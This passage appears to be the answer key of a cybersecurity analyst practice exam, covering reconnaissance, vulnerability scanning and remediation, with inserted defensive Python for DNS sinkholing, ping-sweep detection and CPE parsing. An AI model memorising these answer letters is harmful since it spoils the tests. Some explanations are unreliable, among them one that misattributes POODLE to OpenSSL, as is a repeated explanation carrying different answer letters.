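    added, skipped = [], []
    for domain in sorted({d.strip().lower() for d in bad_domains}):
        if domain in existing_names:
            skipped.append((domain, "already defined; not overriding"))
        elif not HOSTNAME_RE.match(domain):
            skipped.append((domain, "invalid hostname"))
        else:
            added.append(f"{sinkhole} {domain}")
            existing_names.add(domain)
    new_text = existing.rstrip("\n") + "\n" + MARKER + "\n" + "\n".join(added) + "\n"
    return new_text, skipped


def resolves_to_sinkhole(hosts_text, name, sinkhole=SINKHOLE_IP):
    """Hosts files match exact names only: a sinkholed parent does not cover its subdomains."""
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if fields and fields[0] == sinkhole and name.lower() in (n.lower() for n in fields[1:]):
            return True
    return False
```

Because of the exact-match behaviour, a feed that lists only evil-c2.example leaves www.evil-c2.example unblocked; a DNS sinkhole on a resolver can cover whole zones, which is the trade-off the answer is pointing at for on-site systems.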


A. Adversarial threats are individuals, groups, and organizations that are attempting to 
deliberately undermine the security of an organization. Adversaries may include trusted 
insiders, competitors, suppliers, customers, business partners, or even nation-states. 


C. Chris knows that domain registration information is publicly available and that his 
organization controls the data that is published. Since this does not expose anything that 
he should not expect to be accessible, Chris should categorize this as a low impact. 


C. Denial-of-service attacks are rarely part of a penetration test because of the risk they 
create for the target organization. In specific cases where DoS attacks are permitted, they 
are sometimes aimed at a nonproduction instance or network to test DoS handling tech- 
niques. 


C. Windows services can be started and stopped using sc (sc stop servicename) or wmic 
(wmic service where name='servicename' call StopService; the ChangeStartMode Disabled 
call keeps the service from starting again at boot) or via the services.msc GUI. secpol.msc 
controls security policy and will not allow Allan to stop a service. 


C. The increasing digit of the IP address of the target system (.6, .7, .8) and the ICMP 
protocol echo request indicate that this is a ping sweep. This could be part of a port scan, 
but the only behavior that is shown here is the ping sweep. This is ICMP and cannot be 
a three-way handshake, and a traceroute would follow a path, rather than a series of IP 
addresses. 
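The ping-sweep pattern in that capture (one source sending ICMP echo requests to consecutive addresses in quick succession) is straightforward to detect in a packet summary. The Python below is an added example, not code from the book or its authors; the one-line packet summaries are constructed in the style of a Wireshark/tshark listing, and the thresholds (four distinct hosts within one second) are assumptions to tune for your own network.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed packet summaries in the style of a Wireshark one-line view (example data, not the page's capture).
CAPTURE = """\
1 0.000000 10.0.0.5 -> 10.0.0.6 ICMP Echo (ping) request
2 0.000412 10.0.0.6 -> 10.0.0.5 ICMP Echo (ping) reply
3 0.010118 10.0.0.5 -> 10.0.0.7 ICMP Echo (ping) request
4 0.020305 10.0.0.5 -> 10.0.0.8 ICMP Echo (ping) request
5 0.030511 10.0.0.5 -> 10.0.0.9 ICMP Echo (ping) request
6 0.040702 10.0.0.5 -> 10.0.0.10 ICMP Echo (ping) request
7 1.500000 10.0.0.20 -> 10.0.0.1 ICMP Echo (ping) request
8 1.500400 10.0.0.1 -> 10.0.0.20 ICMP Echo (ping) reply
9 2.000000 10.0.0.5 -> 10.0.0.1 TCP 51234 -> 80 [SYN]
"""

ECHO_REQ = re.compile(
    r"^\d+\s+(?P<t>[\d.]+)\s+(?P<src>[\d.]+)\s+->\s+(?P<dst>[\d.]+)\s+ICMP Echo \(ping\) request")


def echo_requests(text):
    """Yield (time, src, dst) for ICMP echo requests only; replies and other protocols are ignored."""
    for line in text.splitlines():
        m = ECHO_REQ.match(line)
        if m:
            yield float(m["t"]), ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"])


def find_ping_sweeps(text, min_hosts=4, window=1.0):
    """Sources that probed >= min_hosts distinct addresses within `window` seconds.

    Returns {src: {"hosts": n, "sequential": bool, "first": ip, "last": ip}}."""
    by_src = defaultdict(list)
    for t, src, dst in echo_requests(text):
        by_src[src].append((t, dst))
    sweeps = {}
    for src, events in by_src.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):           # sliding time window over this source's probes
            while events[end][0] - events[start][0] > window:
                start += 1
            targets = {dst for _, dst in events[start:end + 1]}
            if len(targets) > len(best):
                best = targets
        if len(best) >= min_hosts:
            ordered = sorted(best)
            sequential = all(int(b) - int(a) == 1 for a, b in zip(ordered, ordered[1:]))
            sweeps[str(src)] = {"hosts": len(best), "sequential": sequential,
                                "first": str(ordered[0]), "last": str(ordered[-1])}
    return sweeps
```

The “sequential” flag is what distinguishes a scanner walking a subnet from, say, a monitoring host pinging a handful of unrelated servers; a randomized sweep would still trip the host-count threshold but not that flag.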


D. While the system responded on common Windows ports, you cannot determine 
whether it is a Windows system. It did respond, and both ports 139 and 445 were acces- 
sible. When the host the Wireshark capture was conducted from queried DNS, it did not 
receive a response, indicating that the system does not have a DNS entry (or at least, it 
doesn’t have one that is available to the host that did the scan and ran the Wireshark 
capture). 


D. nmap has a number of built-in anti-firewall capabilities including packet fragmenta- 
tion, decoy scans, spoofing of source IP and source port, and scan timing techniques that 
make detection less likely. Spoofing the target IP address won’t help; her packets still need 
to get to the actual target! 
C. DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to 
alternate IP addresses. This may be intentional if the DNS server owner wants to ensure 
that specific sites are blocked, but it can also be leveraged by attackers who manage to 
either take control of the DNS server or who manage to spoof or modify DNS updates. 


B. DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to 
alternate IP addresses. This may be intentional if the DNS server owner wants to ensure 
that specific sites are blocked, but it can also be leveraged by attackers who manage to 
either take control of the DNS server or who manage to spoof or modify DNS updates. 


C. Internal security teams are typically referred to as the blue team for penetration testing 
and security exercises. Red teams are attackers, while the white team establishes the rules 
of engagement and performance metrics for the test. 


B. Original equipment manufacturer (OEM) documentation is provided by the builder 
or creator of the equipment, device, or software. It typically includes information about 
default and recommended settings. Most organizations use OEM and expert consensus 
recommended configurations that have been modified to match the requirements of their 
environment. 


Chapter 2: Domain 2: Vulnerability Management 



A. Using an agent-based scanning approach will provide Kim with the most reliable 
results for systems that are not always connected to the network. The agent can run the 
scans and then report results the next time the agent is connected to a network. The other 
technologies all require that the system be connected to the network during the scan. 


B. As Carla reads this report, she should note that the bottom three vulnerabilities have 
a status of Fixed. This indicates that the information leakage vulnerability is already 
corrected and that the server no longer supports TLSv1.0. The alert about the load balancer 
is severity 1, and Carla should treat it as informational. This leaves a severity 2 vulnerability 
for the expired SSL certificate as the highest-severity issue of the choices presented. 


C. In a VM escape attack, the attacker exploits vulnerabilities in the hypervisor to gain 
access to resources assigned to other guest operating systems. Services running on the 
guest may be vulnerable to the other attacks listed here, but those attacks would only be 
able to access other resources assigned to either the same guest (in the case of buffer 
overflow or directory traversal) or the client (in the case of cross-site scripting). 


B. Common Platform Enumeration (CPE) provides a standard nomenclature for describ- 
ing product names and versions, including applications and operating systems. Common 
Vulnerabilities and Exposures (CVE) provides a standard nomenclature for describing 
security-related software flaws. Common Vulnerability Scoring System (CVSS) provides 
a standardized approach for measuring and describing the severity of security-related 
software flaws. Open Vulnerability and Assessment Language (OVAL) is a language for 
specifying low-level testing procedures used by checklists. 
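CPE names turn up both in nmap’s OS and hardware identification (cpe:/o and cpe:/h, discussed in the Domain 1 answers) and in vulnerability scanner output. The Python below is an added example, not code from the book or its authors: it parses CPE 2.2 URIs and CPE 2.3 formatted strings into their components, pulls every CPE out of constructed nmap-style output, and does wildcard matching of a discovered CPE against a pattern, which is how you would check a scan result against an advisory’s affected-product list. It assumes components contain no escaped colons.

```python
import re
from dataclasses import astuple, dataclass

# Constructed nmap-style output (example data, not from the page's scan).
NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.12
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.9
Nmap scan report for 10.0.0.40
Device type: printer
Running: HP embedded
OS CPE: cpe:/h:hp:laserjet_4250 cpe:/o:hp:jetdirect
Service Info: Host: SP01; OS: Windows; CPE: cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:*:*:*:*
"""

PART_NAMES = {"o": "operating system", "a": "application", "h": "hardware"}


@dataclass(frozen=True)
class CPE:
    part: str
    vendor: str
    product: str
    version: str = ""
    update: str = ""
    edition: str = ""
    language: str = ""

    @property
    def kind(self):
        return PART_NAMES.get(self.part, "unknown")


def parse_cpe(text):
    """Parse a CPE 2.2 URI (cpe:/part:vendor:...) or 2.3 formatted string (cpe:2.3:part:vendor:...).

    Assumes no escaped colons inside components; 2.3 wildcards ('*', '-') become empty strings."""
    if text.startswith("cpe:2.3:"):
        fields = ["" if f in ("*", "-") else f for f in text.split(":")[2:]]
    elif text.startswith("cpe:/"):
        fields = text[len("cpe:/"):].split(":")
    else:
        raise ValueError(f"not a CPE name: {text!r}")
    fields += [""] * (7 - len(fields))
    return CPE(*fields[:7])


CPE_RE = re.compile(r"cpe:(?:/|2\.3:)[oah]:[^\s;,]+")


def extract_cpes(text):
    """All CPE names in tool output, in order of appearance."""
    return [parse_cpe(m) for m in CPE_RE.findall(text)]


def matches(candidate, pattern):
    """True when every component set in `pattern` equals the candidate's (empty = wildcard)."""
    return all(p in ("", c) for c, p in zip(astuple(candidate), astuple(pattern)))


def summarize(text):
    """Group what the scanner identified by kind, e.g. {'hardware': ['hp laserjet_4250'], ...}."""
    out = {}
    for cpe in extract_cpes(text):
        out.setdefault(cpe.kind, []).append(f"{cpe.vendor} {cpe.product}".strip())
    return out
```

Matching on the parsed components rather than on raw strings is what lets a pattern such as cpe:/o:linux:linux_kernel cover every kernel version a scanner reports while still rejecting a different version when the pattern pins one.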
C. Josh should ensure that the ICS is on an isolated network, unreachable from any 
Internet-connected system. This greatly reduces the risk of exploitation. It would not be 
cost-effective to develop a patch himself, and Josh should not trust any software that he 
obtains from an Internet forum. An intrusion prevention system, while a good idea, is not 
as strong a control as network isolation. 


C. This vulnerability has a severity rating of 3/5 and is further mitigated by the fact that 
the server is on an internal network, accessible only to trusted staff. This rises above the 
level of an informational report and should be addressed, but it does not require urgent 
attention. 


B. The Common Vulnerabilities and Exposures (CVE) provides a standard language for 
describing security flaws. Common Platform Enumeration (CPE) provides a standard 
language for product names and versions. Common Configuration Enumeration (CCE) 
provides a standard language for system configurations. The Extensible Configuration 
Checklist Description Format (XCCDF) provides a language for specifying checklists and 
reporting results. 


B. The High Severity Report is the most likely report of the choices given that will pro- 
vide a summary of critical security issues. The Technical Report will likely contain too 
much detail for Rob’s manager. The Patch Report will indicate systems and applications 
that are missing patches but omit other security issues. The Unknown Device Report will 
focus on systems detected during the scan that are not registered with the organization’s 
asset management system. 


A. The Payment Card Industry Data Security Standard (PCI DSS) regulates credit and 
debit card information. The Family Educational Rights and Privacy Act (FERPA) applies 
to student educational records. The Health Insurance Portability and Accountability Act 
(HIPAA) regulates protected health information. The Sarbanes-Oxley (SOX) Act requires 
controls around the handling of financial records for public companies. 


C. Web servers commonly run on ports 80 (for HTTP) and 443 (for HTTPS). Database 
servers commonly run on ports 1433 (for Microsoft SQL Server), 1521 (for Oracle), or 
3306 (for MySQL). Remote Desktop Protocol services commonly run on port 3389. There 
is no evidence that SSH, which uses port 22, is running on this server. 


B. Beth should perform testing of her code before deploying it to production. Because this 
code was designed to correct an issue in a vulnerability scan, Beth should ask the security 
team to rerun the scan to confirm that the vulnerability scan was resolved as one compo- 
nent of her testing. A penetration test is overkill and not necessary in this situation. Beth 
should not deploy the code to production until it is tested. She should not mark the issue 
as resolved until it is verified to work in production. 


B. Port 23 is used by telnet, an insecure unencrypted communications protocol. George 
should ensure that telnet is disabled and blocked. Secure shell (ssh) runs on port 22 and 
serves as a secure alternative. Port 161 is used by the Simple Network Management 
Protocol (SNMP), and port 443 is used for secure web connections. 


B. This system is exposing a service on port 3389. This port is typically used for remote 
administrative access to Windows servers. 
C. The issue identified in this scan report is with a service running on port 3389. 
Windows systems use port 3389 for the Remote Desktop Protocol (RDP). Therefore, Harold 
should turn to this service first. 


D. None of the protocols and versions listed in this question is an acceptable way to cor- 
rect this vulnerability. All versions of SSL contain critical vulnerabilities and should no 
longer be used. TLSv1.0 also contains a vulnerability that would allow an attacker to 
downgrade the cryptography used by the server. Harold should upgrade the server to 
support at least TLSv1.2. 


D. VMware is a virtualization platform that is widely used to run multiple guest operating systems on the same hardware platform. This vulnerability indicates a vulnerability in VMware itself, which is the hypervisor that moderates access to physical resources by those guest operating systems.


C. A jumpbox allows Ken to isolate the vendor systems where they cannot directly access 
any other networked systems. The other solutions listed may be good security practices, 
but they do not mitigate the risk that an insecure vendor system may impact the security 
of other systems on the network. 


B. Quentin should reconfigure cipher support to resolve the issues surrounding the weak cipher support of SSL/TLS and RDP. He should also obtain a new SSL certificate to resolve multiple issues with the current certificate. He should add account security requirements to resolve the naming of guest accounts and the expiration of administrator passwords. There is no indication that any Windows patches are missing on this system.


A. While all of these categories of information should trigger vulnerability scanning for 
assets involved in their storage, processing, or transmission, only credit card information 
has specific regulations covering these scans. The Payment Card Industry Data Security 
Standard (PCI DSS) contains detailed requirements for vulnerability scanning. 


A. Stella should remediate this vulnerability as quickly as possible because it is rated by 
the vendor as a Critical vulnerability. The description of the vulnerability indicates that 
an attacker could execute arbitrary code on the server and use this vulnerability to achieve 
escalation of privilege. Therefore, this should be one of Stella’s highest priorities for 
remediation. 


B. This system is running SharePoint. This application only runs on Microsoft Windows 
servers. 


B. The vulnerability report indicates that SharePoint application patches are available to correct the vulnerability on a variety of versions of SharePoint. This should be Stella’s first course of action as it will correct the underlying issue. Deploying an intrusion prevention system may also prevent attackers from exploiting the vulnerability but it will depend upon the positioning of the IPS and the attacker’s location on the network and will not correct the underlying issue. There is no indication that an operating system patch will correct the issue. Disabling the service will prevent an attacker from exploiting the vulnerability but will also disable the business critical service.


D. A Supervisory Control and Data Acquisition (SCADA) network is a form of industrial 
control system (ICS) that is used to maintain sensors and control systems over a large 
geographic area. 
D. The most likely issue is that Eric’s scanner has not pulled the most recent signatures from the vendor’s vulnerability feed. Eric should perform a manual update and rerun the scan before performing an investigation of the servers in question or filing a bug report.


A. Blind SQL injection vulnerabilities are very difficult to detect and are a notorious 
source of false positive reports. Natalie should verify the results of the tests performed by 
the developers but should be very open to the possibility that this is a false positive report, 
as that is the most likely scenario. 


A. Virtualized systems run full versions of operating systems. If Frank’s scan revealed a 
missing operating system patch when he scanned a virtualized server, the patch should be 
applied directly to that guest operating system. 


D. Andrew can improve the quality and quantity of information available to the scanner by moving to credentialed scanning, moving to agent-based scanning, and integrating asset information into the scans. Any of these actions is likely to reduce the false positive rate. Increasing the sensitivity of scans would likely have the opposite effect, causing the scanner to report even more false positives.


C. Of the choices presented, the maximum number of simultaneous checks per host is the 
only setting that would affect individual systems. Changing the number of simultaneous 
hosts per scan and the network timeout would have an effect on the broader network. 
Randomizing IP addresses would not have a performance impact. 


C. This report simply states that a cookie used by the service is not encrypted. Before raising any alarms, Brenda should investigate the contents of the cookie to determine whether the compromise of its contents would introduce a security issue. This might be the case if the cookie contains session or authentication information. However, if the cookie does not contain any sensitive contents, Brenda may be able to simply leave the service as is.


C. Information asset value refers to the value that the organization places upon data stored, processed, or transmitted by an asset. In this case, the types of information processed (e.g., regulated data, intellectual property, personally identifiable information) help to determine information asset value. The cost of server acquisition, cost of hardware replacement, and depreciated cost all refer to the financial value of the hardware, which is a different concept than information asset value.


D. Laura should consider deploying vulnerability scanning agents on the servers she wants to scan. These agents can retrieve configuration information and send it to the scanner for analysis. Credentialed scanning would also be able to retrieve this information, but it would require that Laura manage accounts on each scanned system. Server-based scanning would not be capable of retrieving configuration information from the host unless run in credentialed mode. Uncredentialed scans would not have the access required to retrieve detailed configuration information from scan targets.


B. The vulnerability report states that the issue is with SQL Server. SQL Server is a database platform provided by Microsoft.
D. It is unlikely that a network IPS would resolve this issue because it would not be able to view the contents of an encrypted SSH session. Disabling port 22 would correct the issue although it may cause business disruption. Disabling AES-GCM is listed in the solution section as a feasible workaround, while upgrading OpenSSH is the ideal solution.


D. Unfortunately, Frank cannot take any action to remediate this vulnerability. He could consider restricting network access to the server, but this would likely have an undesirable effect on email access. The use of encryption would not correct this issue. The vulnerability report indicates that “There is no known fix at this time,” meaning that upgrading Windows or Exchange would not correct the problem.


B. SQL injection vulnerabilities target the data stored in enterprise databases, but they do 
so by exploiting flaws in client-facing applications. These flaws are most commonly, but 
not exclusively, found in web applications. 


B. This vulnerability exists in Microsoft Internet Information Server (IIS), which is a web 
server. The fact that the vulnerability could result in cross-site scripting issues also points 
to a web server. Web servers use the HTTP and HTTPS protocols. Ryan could configure 
IPS rules to filter HTTP/HTTPS access to this server. 


B. Applying a security patch would correct the issue on this server. The fact that the header for this vulnerability includes a Microsoft security bulletin ID (MS17-016) indicates that Microsoft likely released a patch in 2017. Disabling the IIS service would disrupt business activity on the server. Modifying the web application would not likely address this issue as the report indicates that it is an issue with the underlying IIS server and not a specific web application. IPS rules may prevent an attacker from exploiting the vulnerability but they would not correct the underlying issue.


A. As this is an escalation of privilege vulnerability, it is likely that an attacker could gain 
complete control of the system. There is no indication that control of this system would 
then lead to complete control of the domain. Administrative control of the server would 
grant access to configuration information and web application logs, but these issues are 
not as serious as an attacker gaining complete control of the server. 


B. This server is located on an internal network and only has a private IP address. Therefore, the only scan that would provide any valid results is an internal scan. The external scanner would not be able to reach the file server through a valid IP address.


A. Task 1 strikes the best balance between criticality and difficulty. It allows her to 
remediate a medium criticality issue with an investment of only six hours of time. Task 2 
is higher criticality, but would take three weeks to resolve. Task 3 is the same criticality 
but would require two days to fix. Task 4 is lower criticality but would require the same 
amount of time to resolve as Task 1. 


C. While all of these options are viable, the simplest solution is to design a report that 
provides the information and then configure the system to automatically send this report 
to the director each month. 
C. If the firewall is properly configured, the workstation and file server are not accessible by an external attacker. Of the two remaining choices, the web server vulnerability (at severity 5) is more severe than the mail server vulnerability (at severity 1). Most organizations do not bother to remediate severity 1 vulnerabilities because they are usually informational in nature.


A. This is an informational-level report that will be discovered on any server that supports the OPTIONS method. This is not a serious issue and is listed as an informational item, so Mike does not need to take any action to address it.


D. Ports 139 and 445 are associated with Windows systems that support file and printer 
sharing. 


A. While a buffer overflow attack could theoretically have an impact on information stored in the database, a SQL injection vulnerability poses a more direct threat by allowing an attacker to execute arbitrary SQL commands on the database server. Cross-site scripting attacks are primarily user-based threats that would not normally allow database access. A denial-of-service attack targets system availability, rather than information disclosure.


A. IPsec is a secure protocol for the establishment of VPN links. Organizations should no 
longer use the obsolete Secure Sockets Layer (SSL) or Point-to-Point Tunneling Protocol 
(PPTP) for VPN connections or other secure connections. 


D. Rahul does not need to take any action on this vulnerability because it has a severity 
rating of 2 on a five-point scale. PCI DSS only requires the remediation of vulnerabilities 
with at least a “high” rating, and this vulnerability does not clear that threshold. 


C. This vulnerability is with the Network Time Protocol (NTP), a service that runs on UDP port 123. NTP is responsible for synchronizing the clocks of servers, workstations, and other devices in the organization.


D. Aaron should treat this vulnerability as a fairly low priority and may never get around 
to remediating it if there are more critical issues on his network. The vulnerability only 
has a severity rating of 2 (out of 5), and the vulnerability is further mitigated by the fact 
that the server is accessible only from the local network. 


A. The SQL injection attack could be quite serious as it may allow an attacker to retrieve 
and/or modify information stored in the backend database. The second highest priority 
should be resolving the use of unencrypted authentication, as it may allow the theft of 
user credentials. The remaining two vulnerabilities are less serious because they pose only 
a reconnaissance risk. 


A. The report notes that all of the vulnerabilities for these three servers are in Fixed status. This indicates that the vulnerabilities existed but have already been remediated and no additional work is required.
B. The most likely issue is that the maintenance subscription for the scanner expired while it was inactive and the scanner is not able to retrieve current signatures from the vendor’s vulnerability feed. The operating system of the scanner should not affect the scan results. Morgan would not be able to access the scanner at all if she had invalid credentials or the scanner had an invalid IP address.


D. The most likely scenario is that a network IPS is blocking SQL injection attempts sent 
to this server, and the internal scanner is positioned on the network in such a way that it is 
not filtered by the network IPS. If a host IPS were blocking the requests, the vulnerability 
would likely not appear on internal scans either. If a firewall were blocking the requests, 
then no external scanner entries would appear in the log file. 


D. The fact that this vulnerability affects kernel-mode drivers is very serious, as it indicates that an attacker could compromise the core of the operating system in an escalation of privilege attack. The other statements made about this vulnerability are all correct, but they are not as serious as the kernel-mode issue.


B. System engineers are normally in the best position to remediate vulnerabilities because they are responsible for maintaining the server configuration. Network engineers, security analysts, and managers may provide input, but they often lack either the privileges or knowledge to successfully remediate a server.


A. Because both of these hosts are located on the same virtualization platform, it is likely that the network traffic never leaves that environment and would not be controlled by an external network firewall or intrusion prevention system. Ed should first look at the internal configuration of the virtual network to determine whether he can apply the restriction there.


D. This is an example of the POODLE vulnerability that exploits weaknesses in the 
OpenSSL encryption library. While replacing SSL with TLS and disabling weak ciphers 
are good practices, they will not correct this issue. Carl should upgrade OpenSSL to a 
more current version that does not contain this vulnerability. 


B. According to corporate policy, Renee must run the scans on a daily basis, so the weekend is not a viable option. The scans should run when they have the least impact on operations, which, in this scenario, would be in the evening. The purpose of vulnerability scans is to identify known vulnerabilities in systems and not to perform load testing of servers.


A. The highest-severity vulnerability in this report is the use of an outdated version of SNMP. Ahmed can correct this issue by disabling the use of SNMPv1 and SNMPv2, which contain uncorrectable security issues, and replacing them with SNMPv3. The other actions offered as choices in this question would remediate other vulnerabilities shown in the report, but they are all of lower severity than the SNMP issue.


C. Glenda can easily resolve this issue by configuring workstations to automatically upgrade Chrome. It is reasonable to automatically deploy Chrome updates to workstations because of the fairly low impact of a failure and the fact that users could switch to another browser in the event of a failure. Manually upgrading Chrome would also resolve the issue, but it would not prevent future issues. Replacing Chrome with Internet Explorer would resolve this issue but create others, as Internet Explorer is no longer supported by Microsoft. This is a serious issue, so Glenda should not ignore the report.
B. Glenda should remediate this vulnerability as quickly as possible because it occurs widely throughout her organization and has a significant severity (4 on a five-point scale). If an attacker exploits this vulnerability, he or she could take control of the affected system by executing arbitrary code on it.


C. Oracle database servers use port 1521 for database connections. Port 443 is used for HTTPS connections to a web server. Port 1433 is used by Microsoft SQL Server for database connections. Port 8080 is a nonstandard port for web services.


A. The most likely explanation for this result is that the organization is running web 
services on a series of nonstandard ports from 2025 to 2035. The banner returned by 
the service on these ports indicates the use of Microsoft Internet Information Services 
and does not appear to be a false positive. There is no indication that the server has been 
compromised, although it may soon be compromised if they don’t update their outdated 
version of IIS! 


D. This cipher uses the insecure Data Encryption Standard (DES) algorithm and should 
be replaced. The other ciphers listed all use the secure Advanced Encryption Standard 
(AES) in place of DES encryption. 


B. The PCI DSS standard requires that merchants and service providers present a clean 
scan result that shows no critical or high vulnerabilities in order to maintain compliance. 


C. The vulnerability shown here affects PNG processing on systems running Windows. PNG is an acronym for Portable Network Graphics and is a common image file format.


C. Patrick should be extremely careful with this patch. If the patch causes services to fail, 
it has the potential to disable all of his organization’s Windows servers. This is a serious 
risk and requires testing prior to patch deployment. Patrick’s best course of action is to 
deploy the patch in a test environment and then roll it out into production on a staged 
basis if that test is successful. Options that involve deploying the patch to production 
systems prior to testing may cause those services to fail. Disabling all external access to 
systems is likely an overreaction that would have critical business impact. 


C. Common Configuration Enumeration (CCE) provides a standard nomenclature for discussing system configuration issues. Common Platform Enumeration (CPE) provides a standard nomenclature for describing product names and versions. Common Vulnerabilities and Exposures (CVE) provides a standard nomenclature for describing security-related software flaws. Common Vulnerability Scoring System (CVSS) provides a standardized approach for measuring and describing the severity of security-related software flaws.


C. The standard scan of 1,900 common ports is a reasonably thorough scan that will conclude in a realistic period of time. If Aaron knows of specific ports used in his organization that are not included in the standard list, he could specify them using the Additional section of the port settings. A full scan of all 65,535 ports would require an extremely long period of time on a Class C network. Choosing the Light Scan setting would exclude a large number of commonly used ports, while the None setting would not scan any ports.
C. The Apache web server stores log files in a file named access_log. By default on CentOS, this file may be found at /var/log/httpd/access_log.


A. From the information given in the scenario, you can conclude that all of the HTTP/HTTPS vulnerabilities are not exploitable by an attacker because of the firewall restrictions. However, OpenSSL is an encryption package used for other services, in addition to HTTPS. Therefore, it may still be exposed via SSH or other means. Ken should replace it with a current, supported version because running an end-of-life (EOL) version of this package exposes the organization to potentially unpatchable security vulnerabilities.


B. Banner grabbing scans are notorious for resulting in false positive reports because the 
only validation they do is to check the version number of an operating system or application 
against a list of known vulnerabilities. This approach is unable to detect any remediation 
activities that may have taken place that do not alter the version number. 


B. Vulnerability 3 has a CVSS score of 10.0 because it received the highest possible ratings on all portions of the CVSS vector. For example, it has ratings of “complete” for the confidentiality, integrity, and availability impact metrics, while the other two vulnerabilities have ratings of “partial” or “none” for those same metrics.


D. A cybersecurity analyst should consider all of these factors when prioritizing remediation of vulnerabilities. The severity of the vulnerability is directly related to the risk involved. The likelihood of the vulnerability being exploited may be increased or reduced based upon the affected system’s network exposure. The difficulty of remediation may impact the team’s ability to correct the issue with a reasonable commitment of resources.


B. There is no indication in the scenario that the server is running a database; in fact, the scenario indicates that the server is dedicated to running the Apache web service. Therefore, it is unlikely that a database vulnerability scan would yield any results. Landon should run the other three scans, and if they indicate the presence of a database server, he could follow up with a specialized database vulnerability scan.


C. The vulnerability report’s impact statement reads as follows: “If successfully exploited, this vulnerability could lead to intermittent connectivity problems, or the loss of all NetBIOS functionality.” This is a description of an availability risk.


B. The CVSS string indicates that there is no Confidentiality (C:N) or Availability (A:N) 
risk associated with this vulnerability. It does indicate that there is a partial Integrity risk 
(I:P). 


C. Data classification is a set of labels applied to information based upon its degree of sensitivity and/or criticality. It would be the most appropriate choice in this scenario. Data retention requirements dictate the length of time that an organization should maintain copies of records. Data remanence is an issue where information thought to be deleted may still exist on systems. Data privacy may contribute to data classification but does not encompass the entire field of data sensitivity and criticality in the same manner as data classification. For example, a system may process proprietary business information that would be very highly classified and require frequent vulnerability scanning. Unless that system also processed personally identifiable information, it would not trigger scans under a system based solely upon data privacy.
C. In this scenario, a host firewall may be an effective way to prevent infections from occurring in the first place, but it will not expedite the recovery of a system that is already infected. Intrusion prevention systems and security patches will generally not be effective against a zero-day attack and also would not serve as a recovery control. Backups would provide Tom with an effective way to recover information that was encrypted during a ransomware attack.


B. There is no reason to believe that upgrading the operating system will resolve this 
application vulnerability. All of the other solutions presented are acceptable ways to 
address this risk. 


D. This is a serious vulnerability because it exposes significant network configuration information to attackers and could be used to wage other attacks on this network. However, the direct impact of this vulnerability is limited to reconnaissance of network configuration information.


B. In this case, Ted should ask the DBA to recheck the server to ensure that the patch was properly applied. It is not yet appropriate to mark the issue as a false positive report until Ted performs a brief investigation to confirm that the patch is applied properly. This is especially true because the vulnerability relates to a missing patch, which is not a common source of false positive reports. There was no acceptance of this vulnerability, so Ted should not mark it as an exception. Ted should not escalate this issue to management because the DBA is working with him in good faith.


A. This is most likely a false positive report. The vulnerability description says “note 
that this script is experimental and may be prone to false positives.” It is less likely that 
the developers and independent auditors are all incorrect. The scanner is most likely 
functioning properly, and there is no indication that either it or the database server is 
misconfigured. 


B. X.509 certificates are used to exchange public keys for encrypted communications. They are a fundamental part of the SSL and TLS protocols, and an issue in an X.509 certificate may definitely affect HTTPS, SSH, and VPN communications that depend upon public key cryptography. HTTP does not use encryption and would not be subject to this vulnerability.


A. This is an example of a false positive report. The administrator demonstrated that the database is not subject to the vulnerability because of the workaround, and Larry went a step further and verified this himself. Therefore, he should mark the report as a false positive in the vulnerability scanner.


B. False positive reports like the one described in this scenario are common when a vulnerability scanner depends upon banner grabbing and version detection. The primary solution to this issue is applying a patch that the scanner would detect by noting a new version number. However, the administrator performed the perfectly acceptable action of remediating the vulnerability in a different manner without applying the patch, but the scanner is unable to detect that remediation activity and is reporting a false positive result.


C. The Post Office Protocol v3 (POP3) is used for retrieving email from an email server. 
A. Margot can expect to find relevant results in the web server logs because they would contain records of HTTP requests to the server. Database server logs would contain records of the queries made against the database. IDS logs may contain logs of SQL injection alerts. Netflow logs would not contain useful information because they only record traffic flows, not the details of the communications.


A. The runas command allows an administrator to execute a command using the privileges of another user. Linux offers the same functionality with the sudo command. The Linux su command is similar but allows an administrator to switch user identities, rather than simply execute a command using another user’s identity. The ps command in Linux lists active processes, while the grep command is used to search for text matching a pattern.


A. Plain-text authentication sends credentials “in the clear,” meaning that they are transmitted in unencrypted form and are vulnerable to eavesdropping by an attacker with access to a network segment between the client and server.


B. Common Vulnerabilities and Exposures (CVE) provides a standard nomenclature for describing security-related software flaws. Common Platform Enumeration (CPE) provides a standard nomenclature for describing product names and versions, including applications and operating systems. Common Vulnerability Scoring System (CVSS) provides a standardized approach for measuring and describing the severity of security-related software flaws. Open Vulnerability and Assessment Language (OVAL) is a language for specifying low-level testing procedures used by checklists.


D. Fingerprinting vulnerabilities disclose information about a system and are used in reconnaissance attacks. This vulnerability would allow an attacker to discover the operating system and version running on the target server.


B. The majority of the most serious issues in this scan report relate to missing security updates to Windows and applications installed on the server. Amanda should schedule a short outage to apply these updates. Blocking inbound connections at the host firewall would prevent the exploitation of these vulnerabilities, but it would also prevent users from accessing the server. Disabling the guest account and configuring the use of secure ciphers would correct several vulnerabilities, but they are not as severe as the vulnerabilities related to patches.


D. Ben should obtain permission from the client to perform scans before engaging in any 
other activities. Failure to do so may violate the law and/or anger the client. 


A. The fact that the server runs a critical business process should increase the importance of the patch, rather than deferring it indefinitely. Katherine should work with the engineer to schedule the patch to occur during a regular maintenance window. It is reasonable to wait until that scheduled window because of the relatively low impact of the vulnerability.


C. The best options to correct this vulnerability are either removing the JRE if it is no longer necessary or upgrading it to a recent, secure version. This vulnerability is exploited by the user running a Java applet and does not require any inbound connections to the victim system, so a host firewall would not be an effective control. A web content filtering solution, while not the ideal solution, may be able to block malicious GIF files from exploiting this vulnerability.
B. In this situation, Grace is facing a true emergency. Her web server has a critical vulnerability that is exposed to the outside world and may be easily exploited. Grace should correct the issue immediately, informing all relevant stakeholders of the actions that she is taking. She can then follow up by documenting the change as an emergency action in her organization’s change management process. All of the other approaches in this question introduce an unacceptable delay.


